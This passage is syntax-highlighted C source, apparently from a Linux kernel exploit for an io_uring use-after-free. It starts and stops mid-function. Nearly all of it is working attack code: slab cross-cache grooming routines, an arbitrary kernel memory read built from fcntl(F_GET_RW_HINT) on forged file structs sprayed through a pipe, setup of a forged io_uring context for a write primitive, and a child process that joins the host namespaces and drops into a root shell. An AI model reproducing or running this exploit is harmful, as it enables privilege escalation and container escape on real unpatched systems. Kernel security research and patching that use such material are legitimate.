    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">release_pipe</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">close</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">]);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">]);</span>
<span class="p">}</span>

<span class="c1">// Our child waits to be given super powers and then drops into shell</span>
<span class="kt">void</span> <span class="nf">child_exec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Change our taskname </span>
    <span class="k">if</span> <span class="p">(</span><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`prctl()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">g_shmem</span> <span class="o">==</span> <span class="mh">0x1337</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">sleep</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
            <span class="n">info</span><span class="p">(</span><span class="s">"Child dropping into root shell..."</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/mnt"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/pid"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/net"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="kt">char</span> <span class="o">*</span><span class="n">args</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
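            <span class="n">execve</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
            <span class="c1">// execve() only returns on failure</span>
            <span class="n">err</span><span class="p">(</span><span class="s">"`execve()` failed"</span><span class="p">);</span>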
        <span class="p">}</span>

        <span class="k">else</span> <span class="p">{</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Set-up environment for exploit</span>
<span class="kt">void</span> <span class="nf">setup_env</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Make sure a page is a page and we're not on some bullshit machine</span>
    <span class="kt">long</span> <span class="n">page_sz</span> <span class="o">=</span> <span class="n">sysconf</span><span class="p">(</span><span class="n">_SC_PAGESIZE</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">page_sz</span> <span class="o">!=</span> <span class="mi">4096L</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Page size was: %ld"</span><span class="p">,</span> <span class="n">page_sz</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Pin to CPU 0</span>
    <span class="n">pin_cpu</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Pinned process to core-0"</span><span class="p">);</span>

    <span class="c1">// Increase FD limit</span>
    <span class="n">increase_fds</span><span class="p">();</span>

    <span class="c1">// Create shared mem</span>
    <span class="n">g_shmem</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x1337000</span><span class="p">,</span>
        <span class="n">page_sz</span><span class="p">,</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_SHARED</span><span class="p">,</span>
        <span class="o">-</span><span class="mi">1</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_shmem</span> <span class="o">==</span> <span class="n">MAP_FAILED</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`mmap()` failed"</span><span class="p">);</span> <span class="p">}</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Shared memory @ %p"</span><span class="p">,</span> <span class="n">g_shmem</span><span class="p">);</span>

    <span class="c1">// Create child</span>
    <span class="n">g_child</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_child</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`fork()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Child</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_child</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">child_exec</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spawned child: %d"</span><span class="p">,</span> <span class="n">g_child</span><span class="p">);</span>

    <span class="c1">// Change our name</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`prctl()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Create io ring</span>
    <span class="k">struct</span> <span class="n">io_uring_params</span> <span class="n">params</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">io_uring_queue_init_params</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">params</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_queue_init_params()` failed"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Created io_uring"</span><span class="p">);</span>

    <span class="c1">// Create pipe</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Creating pipe..."</span><span class="p">);</span>
    <span class="n">create_pipe</span><span class="p">();</span>
<span class="p">}</span>

<span class="c1">// Decrement file-&gt;f_count to 0 and free the filp</span>
<span class="kt">void</span> <span class="nf">do_uaf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">io_uring_unregister_files</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_unregister_files()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let the free actually happen</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 1:</span>
<span class="c1">// Allocate enough objects to guarantee that we own enough slabs to</span>
<span class="c1">// overflow the CPU partial list later, when we free one object from each</span>
<span class="c1">// slab</span>
<span class="kt">void</span> <span class="nf">cc_1</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
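    <span class="c1">// Calculate the number of objects to spray: enough to fill</span>
    <span class="c1">// (CPU_PARTIAL + 1) slabs, scaled by OVERFLOW_FACTOR for margin</span>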
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="p">(</span><span class="n">OBJS_PER_SLAB</span> <span class="o">*</span> <span class="p">(</span><span class="n">CPU_PARTIAL</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">*</span> <span class="n">OVERFLOW_FACTOR</span><span class="p">;</span>
    <span class="n">g_cc1_num</span> <span class="o">=</span> <span class="n">spray_amt</span><span class="p">;</span>

    <span class="c1">// Paranoid</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">spray_amt</span> <span class="o">&gt;</span> <span class="n">CROSS_CACHE_MAX</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Illegal spray amount"</span><span class="p">);</span> <span class="p">}</span>

    <span class="c1">//info("Spraying %lu `filp` objects...", spray_amt);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 2:</span>
<span class="c1">// Allocate OBJS_PER_SLAB - 1 objects to *probably* create a new active slab,</span>
<span class="c1">// leaving a slot for the victim filp that is allocated next</span>
<span class="kt">void</span> <span class="nf">cc_2</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Spray one object fewer than a full slab holds</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">g_cc2_num</span> <span class="o">=</span> <span class="n">spray_amt</span><span class="p">;</span>

    <span class="c1">//info("Spraying %lu `filp` objects...", spray_amt);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 3:</span>
<span class="c1">// Allocate enough objects to definitely fill the rest of the active slab</span>
<span class="c1">// and start a new active slab</span>
<span class="kt">void</span> <span class="nf">cc_3</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">g_cc3_num</span> <span class="o">=</span> <span class="n">spray_amt</span><span class="p">;</span>

    <span class="c1">//info("Spraying %lu `filp` objects...", spray_amt);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 4:</span>
<span class="c1">// Free all the filps from steps 2 and 3. This leaves our victim page</span>
<span class="c1">// completely empty on the partial list</span>
<span class="kt">void</span> <span class="nf">cc_4</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">//info("Freeing `filp` objects from CC2 and CC3...");</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">g_cc2_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">g_cc3_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 5:</span>
<span class="c1">// Free one object from each slab we allocated in step 1 to overflow the</span>
<span class="c1">// partial list, so that our empty slab on the partial list gets freed</span>
<span class="kt">void</span> <span class="nf">cc_5</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">//info("Freeing `filp` objects to overflow CPU partial list...");</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">g_cc1_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">close</span><span class="p">(</span><span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Reset all state associated with a cross-cache attempt</span>
<span class="kt">void</span> <span class="nf">cc_reset</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Close all the remaining FDs</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Resetting cross-cache state..."</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">CROSS_CACHE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="c1">// Reset number trackers</span>
    <span class="n">g_cc1_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">g_cc2_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">g_cc3_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Do cross cache process</span>
<span class="kt">void</span> <span class="nf">do_cc</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Start cross-cache process</span>
    <span class="n">cc_1</span><span class="p">();</span>
    <span class="n">cc_2</span><span class="p">();</span>

    <span class="c1">// Allocate the victim filp</span>
    <span class="n">alloc_victim_filp</span><span class="p">();</span>

    <span class="c1">// Free the victim filp</span>
    <span class="n">do_uaf</span><span class="p">();</span>

    <span class="c1">// Resume cross-cache process</span>
    <span class="n">cc_3</span><span class="p">();</span>
    <span class="n">cc_4</span><span class="p">();</span>
    <span class="n">cc_5</span><span class="p">();</span>

    <span class="c1">// Allow pages to be freed</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Drain up to 4096 bytes queued in the pipe</span>
<span class="kt">void</span> <span class="nf">reset_pipe_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">read</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Write 4096 zero bytes into the pipe</span>
<span class="kt">void</span> <span class="nf">zero_pipe_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Offset inside of inode to inode-&gt;i_write_hint</span>
<span class="cp">#define HINT_OFF 0x8fUL
</span>
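<span class="c1">// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at</span>
<span class="c1">// file-&gt;f_inode-&gt;i_write_hint. Repeating this at 8 consecutive addresses</span>
<span class="c1">// reads 8 bytes, assembled least-significant byte first</span>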
<span class="kt">uint64_t</span> <span class="nf">read_8_at</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Set the inode address</span>
    <span class="kt">uint64_t</span> <span class="n">inode_addr_base</span> <span class="o">=</span> <span class="n">addr</span> <span class="o">-</span> <span class="n">HINT_OFF</span><span class="p">;</span>

    <span class="c1">// Set up the buffer for the arbitrary read</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Iterate 8 times to read 8 bytes</span>
    <span class="kt">uint64_t</span> <span class="n">val</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="c1">// Calculate inode address</span>
        <span class="kt">uint64_t</span> <span class="n">target</span> <span class="o">=</span> <span class="n">inode_addr_base</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>

        <span class="c1">// Set up a fake file 16 times (number of files per page), we don't know</span>
        <span class="c1">// yet which of the 16 slots our UAF file is at</span>
        <span class="n">reset_pipe_buf</span><span class="p">();</span>
        <span class="c1">// 0x100-byte slots, with the inode pointer at +0x20 in each</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">slot</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">slot</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">slot</span><span class="o">++</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[(</span><span class="n">slot</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// Create the content</span>
        <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

        <span class="c1">// Read one byte back</span>
        <span class="kt">uint64_t</span> <span class="n">arg</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">fcntl</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="n">F_GET_RW_HINT</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">arg</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">err</span><span class="p">(</span><span class="s">"`fcntl()` failed"</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Add to val</span>
        <span class="n">val</span> <span class="o">|=</span> <span class="p">(</span><span class="n">arg</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">val</span><span class="p">;</span>
<span class="p">}</span>

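<span class="c1">// Read bytes of a comm string at `addr` one at a time, using the same</span>
<span class="c1">// `fcntl(F_GET_RW_HINT)` primitive as `read_8_at()`</span>
<span class="kt">void</span> <span class="nf">read_comm_at</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">comm</span><span class="p">)</span>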
<span class="p">{</span>
    <span class="c1">// Set the inode address</span>
    <span class="kt">uint64_t</span> <span class="n">inode_addr_base</span> <span class="o">=</span> <span class="n">addr</span> <span class="o">-</span> <span class="n">HINT_OFF</span><span class="p">;</span>

    <span class="c1">// Set up the buffer for the arbitrary read</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Iterate 8 times to read the first 8 bytes of the comm string</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="c1">// Calculate inode address</span>
        <span class="kt">uint64_t</span> <span class="n">target</span> <span class="o">=</span> <span class="n">inode_addr_base</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>

        <span class="c1">// Set up a fake file 16 times (number of files per page), we don't know</span>
        <span class="c1">// yet which of the 16 slots our UAF file is at</span>
        <span class="n">reset_pipe_buf</span><span class="p">();</span>
        <span class="c1">// 0x100-byte slots, with the inode pointer at +0x20 in each</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">slot</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">slot</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">slot</span><span class="o">++</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[(</span><span class="n">slot</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// Create the content</span>
        <span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

        <span class="c1">// Read one byte back</span>
        <span class="kt">uint64_t</span> <span class="n">arg</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">fcntl</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="n">F_GET_RW_HINT</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">arg</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">err</span><span class="p">(</span><span class="s">"`fcntl()` failed"</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Add to comm buf</span>
        <span class="n">comm</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">arg</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">write_setup_ctx</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">what</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">where</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Copy in our saved copy of the real ring's file struct</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span><span class="p">],</span> <span class="n">g_ring_copy</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>

    <span class="c1">// Set f-&gt;f_count to 1 </span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0x38</span><span class="p">];</span>
    <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set f-&gt;private_data to our scratch space</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0xc8</span><span class="p">];</span>
    <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="n">g_scratch</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_cached</span>
    <span class="kt">size_t</span> <span class="n">cqe_cached</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x240</span><span class="p">;</span>
    <span class="n">cqe_cached</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
